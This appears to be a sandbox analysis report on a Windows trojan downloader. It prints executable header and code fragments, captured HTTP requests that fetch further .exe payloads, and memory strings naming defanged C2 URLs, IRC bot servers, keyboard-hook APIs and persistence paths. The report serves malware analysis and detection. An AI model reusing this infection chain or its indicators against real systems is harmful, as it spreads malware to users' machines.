MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......(.$.l.J}l.J}l.J}..A}m.J}..D}o.J}..@}g.J}..N}n.J}...}a.J}l.K}0.J}..A}i.J}..L}m.J}Richl.J}................PE..L......S.....................`.......Q............@..........................0.............................................. ............!...........................................................................................................Buffer.P........................... ..`.Ddos....'... ...0... .............. ..`.text...Z....P.......P.............. ..`.Breakth.....`.......`.............. ..`.Socket. ....p.......p.............. ..`.SocketB.,.......0.................. ..`.Attack............................. ..`.rdata..P........ ..................@..@.data...@...........................@....rsrc....!.......0..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
<<< skipped >>>
GET /tjapis.php?mac=000C29EC7FC5&st=1&exez=tqrl_90_4090.exe&exef=DL.exe&pass=e4df6e48b09cbba7c493c1139b8aca47&url1=hXXp://ya.ru/&url2=hXXp://dasf.cn/ HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: union.yoyolm.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 16 Oct 2014 21:26:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PHP/5.3.24
Set-Cookie: yuyuapi=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT
Content-type: text/html
Content-Length: 89
..."%local server IP%"35..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">....
GET /pcbrowser/down.php?pid=4299 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: down2.uc.cn
Connection: Keep-Alive
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Thu, 16 Oct 2014 21:27:09 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Location: hXXp://umcdn.uc.cn/down/4299/Browser_V3.0.1644.0_r_4299_(Build14101116).exe
0..
GET /0815/help1.html HTTP/1.0
Host: update.yoyolm.net
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Date: Thu, 16 Oct 2014 21:26:51 GMT
Content-Length: 538
Content-Type: text/html
Last-Modified: Tue, 09 Sep 2014 07:24:49 GMT
Connection: Close
ETag: "e47ee24ffcbcf1:67c"
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
Fw-Via: MISS from cnc-sd-153-132.fcd, DISK HIT from ctl-gx-254-145.fcd
TRW2VjdF0KODY9MQo4Nz0xCjg4PTEKODk9MQo5MD0xCjkxPTEKOTI9MQo5Mz0xCjk0PTEKOTU9MQo5Nj0xCjk3PTEKOTg9MQo5OT0xCjEwMD0xCjEwMT0xCjE1MD0xCjE1MT0xCjE1Mj0xCjE1Mz0xCjE1ND0xCltnXQowPTEKW3BhXQowPTEKW2kxXQowPTEKW2kyXQowPee juiYkeWboui0rQpbaTNdCjA9aHR0cDovL3d3dy5tZWltb3R1YW4uY29tL2ljby5pY28KW2k0XQowPW1tdC5pY28KW2k1XQowPWh0dHA6Ly93d3cubWVpbW90dWFuLmNvbS8/cmwKW3NuYW1mMV0KMD00CltzbmFtZjJdCjA9NApbc25hbV0KMD0zCltzanMzXQowPTEwCltyZWNdCjA9aHR0cDovL2RsLjM2MHNhZmUuY29tL3AvU2V0dXBfb2VtcWQ1MS5leGUKW2Rpcl0KMD1TZXR1cF9vZW1xZDUxLmV4ZQpbZHNjXQowPS9TCltlZF0KRTA9MQ==..
GET /xtsszs_qn2.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xtsszs.oss-cn-hangzhou.aliyuncs.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 16 Oct 2014 21:27:02 GMT
Content-Type: application/octet-stream
Content-Length: 842664
Connection: close
Accept-Ranges: bytes
ETag: "EB6DBA81F98D5C0DDFF2104289EA7BD3"
Last-Modified: Fri, 10 Oct 2014 07:19:34 GMT
Server: AliyunOSS
x-oss-request-id: 544038264BBECED823554E64
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................J.......J...........%....:.......:.......:......Rich....................PE..L......P.................r...j...B...8............@.........................................................................@........................................................................................................................text....q.......r.................. ..`.rdata..n .......,...v..............@..@.data.... ..........................@....ndata...................................rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H......G..H.P.u..u..u.....@..B...SV.5..G.W.E.P.u.....@..e...E..E.P.u.....@..}..e....D.@........FR..VV..U... M.........3..M.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...H.@..E..P.E..E.P.u.....@..u....E..9}...w....~X.te.v4..L.@....E.tU.}.j.W.E......E.......P.@..vXW..T.@..u..5X.@.W..h ....E..E.Pj.h.jG.W....@..u.W...u....E.P.u.....@._^3.[.....L$....G...i. @...T.....tUVW.q.3.;5..G.sD..i. @...D..S.....t.G.....t...O..t .....u...3....3...F. @..;5..G.r.[_^...U..QQ.U.S....G.V.
<<< skipped >>>
GET /6/tqrl_90_4090.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: down.tianyunxj.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 16 Oct 2014 21:26:32 GMT
Content-Length: 3098224
Content-Type: application/octet-stream
Last-Modified: Sat, 13 Sep 2014 01:10:57 GMT
Connection: Keep-Alive
ETag: "6c7c992efcecf1:1823"
Content-Location: hXXp://down.tianyunxj.com/setup.exe?404;hXXp://down.tianyunxj.com:80/6/tqrl_90_4090.exe
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
Fw-Via: DISK HIT from ctl-zj-205-074.fcd, DISK HIT from ctl-gx-254-145.fcd
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.e|.../.../.../.../.../..T/.../..V/.../.../.../R.;/.../e.!/.../.../.../..Q/.../Rich.../........................PE..L......N.................t...........>............@..........................0........0..................................................k.......... )/.P............................................................................................text....s.......t.................. ..`.rdata..Z............x..............@..@.data...............................@....ndata...`...`...........................rsrc....k.......l..................@..@................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....._B..H.P.u..u..u...\.@..B...SV.5._B..E.WP.u...`.@..e...E..E.P.u...d.@..}..e....D.@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...H.@..E...E.P.E.P.u...h.@..u....E..9}...w....~X.te.v4..L.@....E.tU.}.j.W.E......E.......P.@..vXW..T.@..u..5X.@.W...E..E.h ...Pj.h.WB.W..l.@..u.W...u....E.P.u...p.@._^3.[.....L$..(_B...Si.....VW.T.....tO.q.3.;5,_B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5,_B.r._^[...U..QQ.U.SV..i.
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
CF»Æ¹Ï͸ÊÓ¸¨Öúv5.6.exe_1324:
.text
.text
.rdata
.rdata
@.data
@.data
.rsrc
.rsrc
t$(SSh
t$(SSh
~%UVW
~%UVW
.tTPV
.tTPV
FTPjK
FTPjK
FtPj;
FtPj;
F.PjRWj
F.PjRWj
u.WWj
u.WWj
u.VVj
u.VVj
u$SShe
u$SShe
wininet.dll
wininet.dll
SkinH_EL.dll
SkinH_EL.dll
psapi.dll
psapi.dll
HttpOpenRequestA
HttpOpenRequestA
HttpSendRequestA
HttpSendRequestA
HttpQueryInfoA
HttpQueryInfoA
hXXp://VVV.wei235.com/xixi/8.13.1.txt
hXXp://VVV.wei235.com/xixi/8.13.1.txt
hXXp://VVV.wei235.com/xbb.txt
hXXp://VVV.wei235.com/xbb.txt
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
http=
http=
HTTP/1.1
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
hXXp://
hXXp://
%s;7*
%s;7*
0%x@w
0%x@w
%C^L:
%C^L:
%s T5
%s T5
]E4%F(
]E4%F(
.Funr
.Funr
k%UPp
k%UPp
fg.VG
fg.VG
%C',@
%C',@
>Ùd
>Ùd
0'.Ll
0'.Ll
[I(3/#N0.bd
[I(3/#N0.bd
j"%u=w
j"%u=w
q%Xn`
q%Xn`
@|H.NI
@|H.NI
.wdd!
.wdd!
S|%u4
S|%u4
*.Ea]S
*.Ea]S
Q.CGo
Q.CGo
fTpe
fTpe
.LLbX
.LLbX
-.Mdl
-.Mdl
\-A}=3K
\-A}=3K
Y:.akpS
Y:.akpS
$.Zcqn
$.Zcqn
u.Jck~
u.Jck~
zx/%FN[
zx/%FN[
ce_%D
ce_%D
%C@0H
%C@0H
%s=\RI
%s=\RI
}j%c%Y)
}j%c%Y)
Rx.GR
Rx.GR
4o#.dM
4o#.dM
IeS`%C
IeS`%C
[n 4\.UY
[n 4\.UY
,4.qO,
,4.qO,
gQ'.Io
gQ'.Io
%cLur?
%cLur?
s%DHB
s%DHB
]I%%X
]I%%X
5r.US
5r.US
:mD].tB
:mD].tB
f%fUZ
f%fUZ
.fOuV12
.fOuV12
*_.dC
*_.dC
&-N}
&-N}
({?.cQm
({?.cQm
.Cqx~c
.Cqx~c
.`.Qw
.`.Qw
**.dU
**.dU
!n]%x
!n]%x
%X,Cr
%X,Cr
&.PFy{xh
&.PFy{xh
.um ZZE7L
.um ZZE7L
/^p%u$
/^p%u$
I.NoQY
I.NoQY
zu.ew
zu.ew
D/.nT
D/.nT
q.7.qE
q.7.qE
W>^T%S
W>^T%S
%XiR^
%XiR^
1%SqlnD
1%SqlnD
U[5%u
U[5%u
.OW74
.OW74
"E.jV
"E.jV
c T.Om
c T.Om
*U%XOd
*U%XOd
D%FW@
D%FW@
.gM>$slt
.gM>$slt
B.iR%
B.iR%
vv#%sY7x
vv#%sY7x
.TY3F
.TY3F
kEY94
kEY94
.nyBK
.nyBK
wN%U/
wN%U/
4.Ky%t
4.Ky%t
.h.fO
.h.fO
.TK$N
.TK$N
%dRB:W
%dRB:W
[I9%f
[I9%f
8o%sx
8o%sx
.WE= T!N
.WE= T!N
#?%s(C(
#?%s(C(
Rd.hYp
Rd.hYp
.TX=6
.TX=6
,%x)E
,%x)E
R%X4C (
R%X4C (
$7.Gs
$7.Gs
d,.bw p
d,.bw p
o .Kb
o .Kb
KOz-%c Rd
KOz-%c Rd
zkey0
zkey0
=.Lw/Ch
=.Lw/Ch
!c%SGd
!c%SGd
A.YA'
A.YA'
`.yV8
`.yV8
.qL8d0{
.qL8d0{
m>[So;.yd]
m>[So;.yd]
_ÎW,
_ÎW,
%UZtQ
%UZtQ
.Fu:#
.Fu:#
SShXuy@
SShXuy@
f.kz"
f.kz"
@o.Ns
@o.Ns
i.IK(
i.IK(
9rBÀ
9rBÀ
.nm[&
.nm[&
.DDU0
.DDU0
%f$8C
%f$8C
\SkinH_EL.dll
\SkinH_EL.dll
C$%cmb
C$%cmb
.ppM|
.ppM|
aZ.mO
aZ.mO
%-^
%-^
.hk;~
.hk;~
KERNEL32.DLL
KERNEL32.DLL
COMCTL32.dll
COMCTL32.dll
GDI32.dll
GDI32.dll
MSIMG32.dll
MSIMG32.dll
MSVCRT.dll
MSVCRT.dll
MSVFW32.dll
MSVFW32.dll
USER32.dll
USER32.dll
\dm.dll
\dm.dll
!!"#$%&'())
!!"#$%&'())
ll%X`$Y\
ll%X`$Y\
%Cr#l$rQ2$d%$
%Cr#l$rQ2$d%$
.nu':
.nu':
M_%UHI=
M_%UHI=
;<.dj>
;<.dj>
Am%Xx
Am%Xx
D
D
dlSQL
dlSQL
M CmD$L
M CmD$L
((;|$ #(`
((;|$ #(`
uF.BH:
uF.BH:
t4u-4Z}>T
t4u-4Z}>T
wQ.Bq
wQ.Bq
.AC:%
.AC:%
J.rE\j
J.rE\j
%f; )c=
%f; )c=
dE.Nn
dE.Nn
TSSWPc.Th`
TSSWPc.Th`
.xL$d
.xL$d
7z.tu
7z.tu
&%9SD
&%9SD
.VA`D
.VA`D
jY.kl
jY.kl
o8%dV
o8%dV
VGz%FrE
VGz%FrE
uù u
uù u
.BNFq{
.BNFq{
-hO}]QV:
-hO}]QV:
456789:;
456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
deflate 1.2.3 C
deflate 1.2.3 C
en executed
en executed
p out of range,W %s
p out of range,W %s
I>support g
I>support g
X:
X:
UxTheme.dll
UxTheme.dll
?HttpCli
?HttpCli
%scode,
%scode,
3,%s,%d
3,%s,%d
?.PAVCExcepS,(N
?.PAVCExcepS,(N
' %d.
' %d.
.1.2600.441~
.1.2600.441~
PSAPI.DLLU%fW
PSAPI.DLLU%fW
88.185.3
88.185.3
P129.6.15.29
P129.6.15.29
202.120.
202.120.
\\.\%c
\\.\%c
!
!
~g%s#$A
~g%s#$A
[%d]G
[%d]G
./*.bmp
./*.bmp
log.tx
log.tx
32778cpublic.inject.
32778cpublic.inject.
d8 keypad
d8 keypad
ck.ap
ck.ap
.=.minmax
.=.minmax
x.cfake`!K
x.cfake`!K
km.prot
km.prot
hreaD%s
hreaD%s
on.Leve
on.Leve
wKeyboard
wKeyboard
Scsi%d:
Scsi%d:
1.2.24
1.2.24
.Fe(H;
.Fe(H;
: %s6
: %s6
= (%d/
= (%d/
gx=%f, gy
gx=%f, gy
%ld, pass G
%ld, pass G
orm.de6
orm.de6
O%dhx%dv qV
O%dhx%dv qV
D=%u, "
D=%u, "
z %4u
z %4u
%ld%c$HV
%ld%c$HV
-t.SSSj
-t.SSSj
MSVCRT
MSVCRT
ntoskrnl.exQ
ntoskrnl.exQ
8)939@9|9
8)939@9|9
%cGpS
%cGpS
.Hs;0E
.Hs;0E
#6.BN
#6.BN
PI.DLLK04e
PI.DLLK04e
Ä!w
Ä!w
%c-1IY
%c-1IY
ÈA/
ÈA/
Ë!b
Ë!b
.FLd{
.FLd{
%DxMr
%DxMr
úC~
úC~
.K.kn
.K.kn
.LP.,
.LP.,
;.0%U
;.0%U
n%cp,
n%cp,
.p.lMp
.p.lMp
-17x3}hv
-17x3}hv
n.vg(
n.vg(
.os)H
.os)H
-.rl2Ql
-.rl2Ql
.NSx#
.NSx#
.QB-N
.QB-N
/i.Kn
/i.Kn
.wCdn
.wCdn
&SÓ
&SÓ
2r.Qn
2r.Qn
O,0.lmq
O,0.lmq
appingUWindowsDir
appingUWindowsDir
.Increm^
.Increm^
BkÝPtoLP
BkÝPtoLP
;Gw.one
;Gw.one
ran%s
ran%s
.PoDAttachnCp
.PoDAttachnCp
.DJ-?O8
.DJ-?O8
7G#V%F
7G#V%F
(.text\
(.text\
'@.tp0
'@.tp0
{43C6DBBB-BEAD-4DFB-B6D2-52C5CDB5B70A} = s 'Dm'
{43C6DBBB-BEAD-4DFB-B6D2-52C5CDB5B70A} = s 'Dm'
'Dm.EXE'
'Dm.EXE'
val AppID = s {43C6DBBB-BEAD-4DFB-B6D2-52C5CDB5B70A}
val AppID = s {43C6DBBB-BEAD-4DFB-B6D2-52C5CDB5B70A}
dm.dmsoft = s 'dm.dmsoft'
dm.dmsoft = s 'dm.dmsoft'
CLSID = s '{26037A0E-7CBD-4FFF-9C63-56F2D0770214}'
CLSID = s '{26037A0E-7CBD-4FFF-9C63-56F2D0770214}'
CurVer = s 'dm.dmsoft'
CurVer = s 'dm.dmsoft'
ForceRemove {26037A0E-7CBD-4FFF-9C63-56F2D0770214} = s 'dm.dmsoft'
ForceRemove {26037A0E-7CBD-4FFF-9C63-56F2D0770214} = s 'dm.dmsoft'
ProgID = s 'dm.dmsoft'
ProgID = s 'dm.dmsoft'
stdole2.tlbWWW
stdole2.tlbWWW
~cmdWd
~cmdWd
KeyPress
KeyPress
.aKeyDownWd
.aKeyDownWd
MKeyUpWWWd
MKeyUpWWWd
ShowScrMsgWW
ShowScrMsgWW
msgWd
msgWd
SetShowErrorMsgW
SetShowErrorMsgW
>SGetWindowStateWW
>SGetWindowStateWW
U@SetWindowSizeWWWd
U@SetWindowSizeWWWd
SetWindowStateWWd
SetWindowStateWWd
iRSetKeypadDelayWWd
iRSetKeypadDelayWWd
BkeypadWW
BkeypadWW
SetExportDictWWWd
SetExportDictWWWd
keyWd
keyWd
FindWindowSuperW
FindWindowSuperW
qHKeyDownCharW
qHKeyDownCharW
pOkey_strWd
pOkey_strWd
KeyUpCharWWWd
KeyUpCharWWWd
KeyPressChard
KeyPressChard
KeyPressStrWd
KeyPressStrWd
EnableKeypadPatchWWWd
EnableKeypadPatchWWWd
=PEnableKeypadSyncd
=PEnableKeypadSyncd
EnableRealKeypadd
EnableRealKeypadd
GetKeyStateWd
GetKeyStateWd
[.ReadFiled
[.ReadFiled
WaitKeyW
WaitKeyW
!key_coded
!key_coded
joEnumWindowSuperW
joEnumWindowSuperW
urlW
urlW
=EnableKeypadMsgWd
=EnableKeypadMsgWd
EnableMouseMsgWWd
EnableMouseMsgWWd
method KeyPressWWW
method KeyPressWWW
method KeyDown
method KeyDown
method KeyUpWW
method KeyUpWW
method ShowScrMsgW
method ShowScrMsgW
method SetShowErrorMsg
method SetShowErrorMsg
method GetWindowStateW
method GetWindowStateW
method SetWindowSizeWW
method SetWindowSizeWW
method SetWindowStateW
method SetWindowStateW
method SetKeypadDelayW
method SetKeypadDelayW
method SetExportDictWW
method SetExportDictWW
method FindWindowSuper
method FindWindowSuper
method KeyDownChar
method KeyDownChar
method KeyUpCharWW
method KeyUpCharWW
method KeyPressCharWWW
method KeyPressCharWWW
method KeyPressStr
method KeyPressStr
method EnableKeypadPatchWW
method EnableKeypadPatchWW
method EnableKeypadSyncWWW
method EnableKeypadSyncWWW
method EnableRealKeypadWWW
method EnableRealKeypadWWW
method GetKeyState
method GetKeyState
method WaitKey
method WaitKey
method EnumWindowSuper
method EnumWindowSuper
method EnableKeypadMsg
method EnableKeypadMsg
method EnableMouseMsgW
method EnableMouseMsgW
ADVAPI32.dll
ADVAPI32.dll
IMM32.dll
IMM32.dll
MFC42.DLL
MFC42.DLL
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
SHELL32.dll
SHELL32.dll
VERSION.dll
VERSION.dll
WINMM.dll
WINMM.dll
WS2_32.dll
WS2_32.dll
RegCloseKey
RegCloseKey
dm.dll
dm.dll
\dm.dll /s
\dm.dll /s
$@wininet.dll
$@wininet.dll
%*.*f
%*.*f
CNotSupportedException
CNotSupportedException
commctrl_DragListMsg
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
Afx:%x:%x
COMCTL32.DLL
COMCTL32.DLL
CCmdTarget
CCmdTarget
__MSVCRT_HEAP_SELECT
__MSVCRT_HEAP_SELECT
user32.dll
user32.dll
portuguese-brazilian
portuguese-brazilian
iphlpapi.dll
iphlpapi.dll
SHLWAPI.dll
SHLWAPI.dll
MPR.dll
MPR.dll
RASAPI32.dll
RASAPI32.dll
GetProcessHeap
GetProcessHeap
WinExec
WinExec
GetWindowsDirectoryA
GetWindowsDirectoryA
GetCPInfo
GetCPInfo
KERNEL32.dll
KERNEL32.dll
GetKeyState
GetKeyState
GetKeyboardLayout
GetKeyboardLayout
CreateDialogIndirectParamA
CreateDialogIndirectParamA
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExA
SetWindowsHookExA
GetViewportOrgEx
GetViewportOrgEx
SetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
GetViewportExtEx
WINSPOOL.DRV
WINSPOOL.DRV
comdlg32.dll
comdlg32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyExA
RegCreateKeyExA
ShellExecuteA
ShellExecuteA
WSOCK32.dll
WSOCK32.dll
WININET.dll
WININET.dll
.PAVCException@@
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.prn)|*.prn|
(*.*)|*.*||
(*.*)|*.*||
Shell32.dll
Shell32.dll
Mpr.dll
Mpr.dll
Advapi32.dll
Advapi32.dll
User32.dll
User32.dll
Gdi32.dll
Gdi32.dll
Kernel32.dll
Kernel32.dll
(&07-034/)7 '
(&07-034/)7 '
?? / %d]
?? / %d]
%d / %d]
%d / %d]
: %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
(*.CUR)|*.CUR|
%s:%d
%s:%d
windows
windows
out.prn
out.prn
%d.%d
%d.%d
%d / %d
%d / %d
%d/%d
%d/%d
Bogus message code %d
Bogus message code %d
(%d-%d):
(%d-%d):
%ld%c
%ld%c
VVV.dywt.com.cn
VVV.dywt.com.cn
Service Pack %d
Service Pack %d
Windows 2003
Windows 2003
Windows XP
Windows XP
Windows 2000
Windows 2000
Windows NT
Windows NT
Windows ??
Windows ??
Windows Millenium Edition
Windows Millenium Edition
Windows 98 Second Edition
Windows 98 Second Edition
Windows 98 SP1
Windows 98 SP1
Windows 98
Windows 98
Windows 95 OSR2
Windows 95 OSR2
Windows 95 SP1
Windows 95 SP1
Windows 95
Windows 95
Windows CE
Windows CE
Windows
Windows
Microsoft Windows Me
Microsoft Windows Me
Microsoft Windows 98
Microsoft Windows 98
Microsoft Windows 95
Microsoft Windows 95
Microsoft Windows 2003
Microsoft Windows 2003
Microsoft Windows XP
Microsoft Windows XP
Microsoft Windows 2000
Microsoft Windows 2000
Microsoft Windows NT
Microsoft Windows NT
%s
%s
Reply-To: %s
Reply-To: %s
From: %s
From: %s
To: %s
To: %s
Subject: %s
Subject: %s
Date: %s
Date: %s
Cc: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
%a, %d %b %Y %H:%M:%S
SMTP
SMTP
.PAVCObject@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCResourceException@@
.PAVCUserException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
.PAVCArchiveException@@
zcÁ
zcÁ
VVV.wei235.com
VVV.wei235.com
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CF
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CF
v5.6.exe
v5.6.exe
#include "l.chs\afxres.rc" // Standard components
#include "l.chs\afxres.rc" // Standard components
ADVAPI32.DLL
ADVAPI32.DLL
%s:*:enabled:@shell32.dll,-1
%s:*:enabled:@shell32.dll,-1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Qooirc.zief.pl
Qooirc.zief.pl
proxim.ircgalaxy.pl
proxim.ircgalaxy.pl
NICK wxbxymrj
NICK wxbxymrj
SFC.DLL
SFC.DLL
SFC_OS.DLL
SFC_OS.DLL
USER32.DLL
USER32.DLL
SHLWAPI.DLL
SHLWAPI.DLL
WSOCK32.DLL
WSOCK32.DLL
WININET.DLL
WININET.DLL
%.6x . . :%c%.8x%x %s
%.6x . . :%c%.8x%x %s
JOIN
JOIN
127.0.0.1 ZieF.pl
127.0.0.1 ZieF.pl
#
#
1, 0, 6, 6
1, 0, 6, 6
3, 1227, 0, 0
3, 1227, 0, 0
(*.*)
(*.*)
10.1.0.0
10.1.0.0
(hXXp://VVV.eyuyan.com)
(hXXp://VVV.eyuyan.com)
CF»Æ¹Ï͸ÊÓ¸¨Öúv5.6.exe_1324_rwx_006DE000_00005000:
ADVAPI32.DLL
ADVAPI32.DLL
%s:*:enabled:@shell32.dll,-1
%s:*:enabled:@shell32.dll,-1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Qooirc.zief.pl
Qooirc.zief.pl
proxim.ircgalaxy.pl
proxim.ircgalaxy.pl
NICK wxbxymrj
NICK wxbxymrj
SFC.DLL
SFC.DLL
SFC_OS.DLL
SFC_OS.DLL
USER32.DLL
USER32.DLL
SHLWAPI.DLL
SHLWAPI.DLL
WSOCK32.DLL
WSOCK32.DLL
WININET.DLL
WININET.DLL
%.6x . . :%c%.8x%x %s
%.6x . . :%c%.8x%x %s
JOIN
JOIN
127.0.0.1 ZieF.pl
127.0.0.1 ZieF.pl
#
#
KERNEL32.DLL
KERNEL32.DLL
CF»Æ¹Ï͸ÊÓ¸¨Öúv5.6.exe_1324_rwx_10001000_00039000:
L$(h%f
L$(h%f
SSh0j
SSh0j
msctls_hotkey32
msctls_hotkey32
TVCLHotKey
TVCLHotKey
THotKey
THotKey
\skinh.she
\skinh.she
}uo,x6l5k%x-l h
}uo,x6l5k%x-l h
9p%s m)t4`#b
9p%s m)t4`#b
e"m?c&y1`Ð
e"m?c&y1`Ð
SetViewportOrgEx
SetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
SetWindowsHookExA
SetWindowsHookExA
UnhookWindowsHookEx
UnhookWindowsHookEx
EnumThreadWindows
EnumThreadWindows
EnumChildWindows
EnumChildWindows
`c%US.4/
`c%US.4/
!#$
!#$
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.UPX0
@.UPX0
`.UPX1
`.UPX1
`.reloc
`.reloc
i.exe_1172:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
MFC42.DLL
MFC42.DLL
MSVCRT.dll
MSVCRT.dll
_acmdln
_acmdln
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
ole32.dll
ole32.dll
InternetCrackUrlA
InternetCrackUrlA
WININET.dll
WININET.dll
SHLWAPI.dll
SHLWAPI.dll
.PAVCInternetException@@
.PAVCInternetException@@
360Url
360Url
IEUrl
IEUrl
Other%d
Other%d
hXXp://VVV.wj95.com/
hXXp://VVV.wj95.com/
hXXp://uu.cn170.com/BindPlugIn.ini
hXXp://uu.cn170.com/BindPlugIn.ini
%x.ini
%x.ini
\config.dat
\config.dat
Windows
Windows
1, 0, 0, 2
1, 0, 0, 2
PostInstall.EXE
PostInstall.EXE
DL.exe_1984:
.text
.text
`.data
`.data
.rsrc
.rsrc
MSVBVM60.DLL
MSVBVM60.DLL
#vb6chs.dll
#vb6chs.dll
1111111
1111111
ieframe.dll
ieframe.dll
SHDocVwCtl.WebBrowser
SHDocVwCtl.WebBrowser
WebBrowser
WebBrowser
E:\VB
E:\VB
\VB6.OLB
\VB6.OLB
C:\Windows\SysWOW64\ieframe.oca
C:\Windows\SysWOW64\ieframe.oca
VBA6.DLL
VBA6.DLL
.dwd8
.dwd8
L(.kc
L(.kc
hXXp://uu.cn170.com/y.txt
hXXp://uu.cn170.com/y.txt
hXXp://zw.cn170.com/tj.html
hXXp://zw.cn170.com/tj.html
1.lnk
1.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\
%Documents and Settings%\All Users\
%Documents and Settings%\All Users\
Scripting.FileSystemObject
Scripting.FileSystemObject
WScript.Shell
WScript.Shell
1111111.exe
1111111.exe
DL.exe_1984_rwx_00408000_00005000:
.dwd8
.dwd8
L(.kc
L(.kc
ignite.exe_432:
.text
.text
`.data
`.data
.rsrc
.rsrc
MSVBVM60.DLL
MSVBVM60.DLL
6.vmmvv
6.vmmvv
pVVV.6
pVVV.6
H.yyywsTSTpxyyywfP
H.yyywsTSTpxyyywfP
SHDocVwCtl.WebBrowser
SHDocVwCtl.WebBrowser
#vb6chs.dll
#vb6chs.dll
shdocvw.dll
shdocvw.dll
WebBrowser
WebBrowser
%System%\mshtml.tlb
%System%\mshtml.tlb
%Program Files%\VB
%Program Files%\VB
\VB6.OLB
\VB6.OLB
0%System%\shdocvw.oca
0%System%\shdocvw.oca
winmm.dll
winmm.dll
time.dll
time.dll
advapi32.dll
advapi32.dll
RegCloseKey
RegCloseKey
GetUrlSource
GetUrlSource
RegCreateKeyA
RegCreateKeyA
RegOpenKeyA
RegOpenKeyA
